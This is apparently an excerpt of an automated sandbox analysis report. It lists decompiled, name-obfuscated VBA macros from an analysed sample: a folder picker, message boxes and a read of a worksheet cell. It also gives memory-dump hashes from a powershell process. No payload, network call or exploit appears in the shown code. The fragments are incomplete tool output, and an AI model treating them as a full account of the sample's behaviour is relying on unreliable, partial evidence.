                                                                                                                                    Range

                                                                                                                                    StringsDecrypted Strings
                                                                                                                                    "&"
                                                                                                                                    "&"
                                                                                                                                    ","
                                                                                                                                    "a2"
                                                                                                                                    LineInstructionMeta Information
                                                                                                                                    27

                                                                                                                                    Sub fbkaw4lkuwgbtlske()

                                                                                                                                    28

                                                                                                                                    Dim WB as Workbook

                                                                                                                                    29

                                                                                                                                    Set WB = GetAnotherWorkbook

                                                                                                                                    GetAnotherWorkbook

                                                                                                                                    30

                                                                                                                                    If Not WB Is Nothing Then

                                                                                                                                    31

                                                                                                                                    MsgBox "&" & WB.FullName, vbInformation

                                                                                                                                    MsgBox

                                                                                                                                    FullName

                                                                                                                                    vbInformation

                                                                                                                                    32

                                                                                                                                    Else

                                                                                                                                    33

                                                                                                                                    MsgBox ",", vbCritical

                                                                                                                                    MsgBox

                                                                                                                                    vbCritical

                                                                                                                                    33

                                                                                                                                    Exit Sub

                                                                                                                                    34

                                                                                                                                    Endif

                                                                                                                                    35

                                                                                                                                    x = WB.Worksheets(1).Range("a2")

                                                                                                                                    Range

                                                                                                                                    36

                                                                                                                                    End Sub

                                                                                                                                    APIsMeta Information

                                                                                                                                    GetFolderPath

                                                                                                                                    Path

                                                                                                                                    ThisWorkbook

                                                                                                                                    MsgBox

                                                                                                                                    vbInformation

                                                                                                                                    StringsDecrypted Strings
                                                                                                                                    ","
                                                                                                                                    """"
                                                                                                                                    ":"
                                                                                                                                    LineInstructionMeta Information
                                                                                                                                    18

                                                                                                                                    Sub sfoliq3hwoqihepolfijp()

                                                                                                                                    19

                                                                                                                                    gjpo4jaiwledkgls = GetFolderPath(",", ThisWorkbook.Path)

                                                                                                                                    GetFolderPath

                                                                                                                                    Path

                                                                                                                                    ThisWorkbook

                                                                                                                                    20

                                                                                                                                    If gjpo4jaiwledkgls = "" Then

                                                                                                                                    20

                                                                                                                                    Exit Sub

                                                                                                                                    20

                                                                                                                                    Endif

                                                                                                                                    21

                                                                                                                                    MsgBox ":" & gjpo4jaiwledkgls, vbInformation

                                                                                                                                    MsgBox

                                                                                                                                    vbInformation

                                                                                                                                    22

                                                                                                                                    End Sub

                                                                                                                                    APIsMeta Information

                                                                                                                                    PathSeparator

                                                                                                                                    Application

                                                                                                                                    Right$

                                                                                                                                    Right$

                                                                                                                                    StringsDecrypted Strings
                                                                                                                                    ":"
                                                                                                                                    LineInstructionMeta Information
                                                                                                                                    9

                                                                                                                                    Function dsfl3hadfkb3lkahfoiauhfcfgkwy3jfrkiwed(optional ByVal Title as String = ",", optional ByVal InitialPath as String = ":") as String

                                                                                                                                    10

                                                                                                                                    Dim PS as String

                                                                                                                                    10

                                                                                                                                    PS = Application.PathSeparator

                                                                                                                                    PathSeparator

                                                                                                                                    Application

                                                                                                                                    11

                                                                                                                                    With Application.FileDialog(msoFileDialogFolderPicker)

                                                                                                                                    12

                                                                                                                                    If Not Right$(InitialPath, 1) = PS Then

                                                                                                                                    Right$

                                                                                                                                    12

                                                                                                                                    InitialPath = InitialPath & PS

                                                                                                                                    12

                                                                                                                                    Endif

                                                                                                                                    13

                                                                                                                                    . ButtonName = ":"

                                                                                                                                    13

                                                                                                                                    . Title = Title

                                                                                                                                    13

                                                                                                                                    . InitialFileName = InitialPath

                                                                                                                                    14

                                                                                                                                    If . Show <> - 1 Then

                                                                                                                                    14

                                                                                                                                    Exit Function

                                                                                                                                    14

                                                                                                                                    Endif

                                                                                                                                    15

                                                                                                                                    If Not Right$(GetFolderPath, 1) = PS Then

                                                                                                                                    Right$

                                                                                                                                    15

                                                                                                                                    GetFolderPath = GetFolderPath & PS

                                                                                                                                    15

                                                                                                                                    Endif

                                                                                                                                    16

                                                                                                                                    End With

                                                                                                                                    17

                                                                                                                                    End Function

                                                                                                                                    APIsMeta Information

                                                                                                                                    FileToVBAFunction

                                                                                                                                    Print

                                                                                                                                    StringsDecrypted Strings
                                                                                                                                    ","
                                                                                                                                    LineInstructionMeta Information
                                                                                                                                    23

                                                                                                                                    Sub dfloaswehortiwholehfolsihlkw()

                                                                                                                                    24

                                                                                                                                    txt$ = FileToVBAFunction(",", ",")

                                                                                                                                    FileToVBAFunction

                                                                                                                                    25

                                                                                                                                    Debug.Print txt$

                                                                                                                                    Print

                                                                                                                                    26

                                                                                                                                    End Sub

                                                                                                                                    Reset < >

                                                                                                                                      Executed Functions

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.753181009.000000000340D000.00000040.00000001.sdmp, Offset: 0340D000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_340d000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 2a778c962ade656429783d1f10f08c1d25dc7e00d629c8faa212baafa5df24d5
                                                                                                                                      • Instruction ID: e365b457813da2c93cd98df564c8ce9bb70d2f832a70b08a9620929c17b2e7be
                                                                                                                                      • Opcode Fuzzy Hash: 2a778c962ade656429783d1f10f08c1d25dc7e00d629c8faa212baafa5df24d5
                                                                                                                                      • Instruction Fuzzy Hash: FE012D6150D3C05FD7128B658894A52BFA4AF43224F0D80DBD9888F2A3C2799849C772
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.753181009.000000000340D000.00000040.00000001.sdmp, Offset: 0340D000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_340d000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 1111f1fcce191d4a77e785a4df1274bdc1c51363965e2bafeae31b1699aff3f9
                                                                                                                                      • Instruction ID: 16656e8a98b8656af5b7692768b821543377e58b69f886070af68c8239f10b97
                                                                                                                                      • Opcode Fuzzy Hash: 1111f1fcce191d4a77e785a4df1274bdc1c51363965e2bafeae31b1699aff3f9
                                                                                                                                      • Instruction Fuzzy Hash: D501D870E05340AAE7108A61CD84B67FB88EF42268F08806AED581F2C2C375D44AC6B5
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Non-executed Functions